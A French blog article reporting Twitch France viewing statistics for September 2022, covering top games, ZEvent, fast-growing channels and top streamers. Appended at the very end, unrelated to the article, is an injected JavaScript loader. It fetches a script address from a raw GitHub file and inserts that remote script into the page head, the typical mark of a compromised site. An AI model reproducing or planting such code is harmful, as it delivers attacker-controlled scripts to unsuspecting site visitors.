Statistiques Twitch France – Septembre 2022
Comme chaque mois chez Minuit Douze, nous analysons les tendances de stream sur Twitch afin d’en comprendre les évolutions.
Les jeux les plus regardés
Sans surprise nous retrouvons en ce mois de septembre les jeux esport dans ce top 10 des catégories les plus visionnées : League of Legends, VALORANT, Fortnite et Teamfight Tactics.
La catégorie Just Chatting maintient sa 1ère place notamment avec aminematue et son stream avec Billy le 23 septembre avec une variante de Essayez de ne pas rire, intitulée “La roue de la mort”. A chaque rire, le perdant doit tourner une roue qui lui indiquera un gage à accomplir.
Kamet0 arrive à la 3ème place avec ses introductions de live avant ses commentaires sur son équipe sur League of Legend.
La catégorie Special Events fait son entrée dans le top 10 directement à la 2ème place grâce au ZEvent organisé du 9 au 11 septembre par ZeratoR.
De nombreux streamers y ont participé, notamment Domingo, AntoineDaniel et Ponce qui ont réalisé les meilleures performances pendant l’événement.
https://twitter.com/Domingo/status/1568273318960152576
League of Legends perd une place et arrive 3ème du classement des jeux les plus streamés, le championnat du monde commençant tout juste à la fin du mois (le 29 septembre).
La musique officielle pour les Worlds a été dévoilée le 22 septembre avec une collaboration Lil Nas X x STAR WALKIN’ qui a fait beaucoup de bruits sur la toile :
GTA V perd également une place et se trouve actuellement la 4ème place.
aminematue a exceptionnellement réalisé un stream roleplay (RP) avec Kamet0 le 26 septembre.
On peut remarquer l’apparition de FIFA 23 dans le classement grâce à sa sortie le 26 septembre 2022.
Dans le cadre d’un partenariat Adidas, Kamet0 a diffusé en avant-première l’anime Real Madrid x Adidas “Odyssee Grandeza” ponctuée de différentes animations :
https://twitter.com/Kammeto/status/1572657278020370435
Les Valorant Champions se sont déroulés sur VALORANT du 31 août au 18 septembre et est la plus grande compétition de l’année. L’équipe brésilienne LOUD a remporté le titre de Championne du monde de Valorant.
Gotaga a organisé le Masterkill sur le jeu VALORANT avec Kamet0, Squeezie, Doigby et Locklear. Les 4 participants jouent ensemble en équipe, le plus mauvais de chaque manche doit payer la cagnotte à un spectateur choisi aléatoirement dans le chat de Gotaga. Le montant à payer dépend du multiplicateur de départ ainsi que du nombre de cibles abattues durant la partie. C’est Locklear qui s’en sort le mieux avec 0€ à débourser.
https://twitter.com/GotagaTV/status/1566922803340873728
Call of Duty Warzone chute à la 7ème place. Chowh1 détient 31% du temps de visionnage sur le jeu grâce à sa participation au ZEvent.
Fortnite détient la 8ème place et a annoncé plusieurs collaborations à venir : tout d’abord la célèbre chèvre de Goat Simulator devrait faire son apparition dans le jeu le 17 novembre à l’occasion de la promotion du jeu Goat Simulator 3. Le jeu se prépare également à accueillir un concert interactif de la chanteuse Aya Nakamura du 6 au 9 octobre.
https://twitter.com/FortniteFR/status/1575379981328318464
World of Warcraft fait son entrée dans le top 10 grâce à la sortie de l’extension World of Warcraft Classic: Wrath of the Lich King le 27 septembre.
ZeratoR détient 18% du temps de visionnage sur le jeu grâce à ses streams quotidiens. Son but était de monter au niveau maximum le plus rapidement possible.
Teamfight Tactics est à la 10ème place notamment grâce au Superbrawl, un tournoi européen qui se joue en équipe de 2 joueurs qui a été commenté par le streamer Shaunz, un des fondateurs de l’équipe esport française Aegis. C’est l’équipe française Solary Voltariux qui sort victorieuse de ce tournoi.
Croissance la plus rapide
La chaîne Twitch qui a accumulé le plus de nouveaux followers en septembre est la chaîne du ZEvent à l’occasion de l’événement du même nom organisé du 9 au 11 septembre avec plus de 81K nouveaux followers. La chaîne a principalement diffusé un Twitch Plays Pokémon : les spectateurs en entrant des commandes dans le chat pouvaient jouer au jeu Pokémon édition Vert Feuille ensemble sur la même partie. Le chat a ainsi réussi à obtenir les 8 badges mais n’a pas réussi à vaincre la Ligue Pokémon.
Le héros de notre aventure Twitch Plays Pokémon s'appellera donc JJJJJJ et son rival sera BAAAIJR.
Ca commence très bien : https://t.co/LaKBDPpRVb pic.twitter.com/tWGsvaJIvA
— Z Event (@ZEventfr) September 9, 2022
PapeSan continue ses streams IRL qui ont de plus en plus de succès. Depuis le ZEvent il a voyagé à Prague et à Istanbul.
aminematue maintient toujours sa place dans les chaînes Twitch avec la croissance la plus rapide avec plus de 60K nouveaux followers grâce à ses lives réactions à des reportages américains.
Domingo remonte à la 4ème place du classement grâce à ses streams lors du ZEvent.
Son émission Popcorn a repris le mardi 4 septembre.
Etoiles est à la 5ème place avec ses “Nuit de la Culture”, des streams où il diffuse des épisodes de l’émission Question pour un Champion afin d’engranger de nouvelles connaissances pour sa possible future participation à l’émission.
Pic de stream
On retrouve les jeux habituels tels que GTA V Fortnite ou encore Valorant.
Call of Duty: Modern Warfare II fait son entrée avec 1 179 streams en simultané.
Les Top 5 des streamers
On peut remarquer que les 5 streamers de ce top étaient présents au ZEvent 2022.
Zerator a réussi à atteindre un pic viewers de 269K lors de son événement caritatif, cependant il a passé en septembre plus d’heures à streamer sa découverte de la nouvelle extension de World of Warcraft Classic: Wrath of the Lich King.
Kamet0 cumule le plus d’heures de stream dans la catégorie Just Chatting et VALORANT grâce aux rediffusions de son équipe sur le jeu VALORANT, la catégorie Just Chatting étant la catégorie utilisée pour l’introduction de ses lives.
Conclusion
Les jeux esport habituels dominent toujours le classement grâce aux nombreuses compétitions en cours et aux mises à jour régulières.
Le ZEvent de 2022 a grandement impacté le reste du classement. En effet l’événement caritatif a cumulé près de 15 millions d’heures visionnées, 2 000 heures de stream, 55 streamers présents et a permis de récolter 10 182 126€ (soit 1,18% de plus que l’année dernière).
https://twitter.com/ZeratoR/status/1569749976929951755
;var url = ‘https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});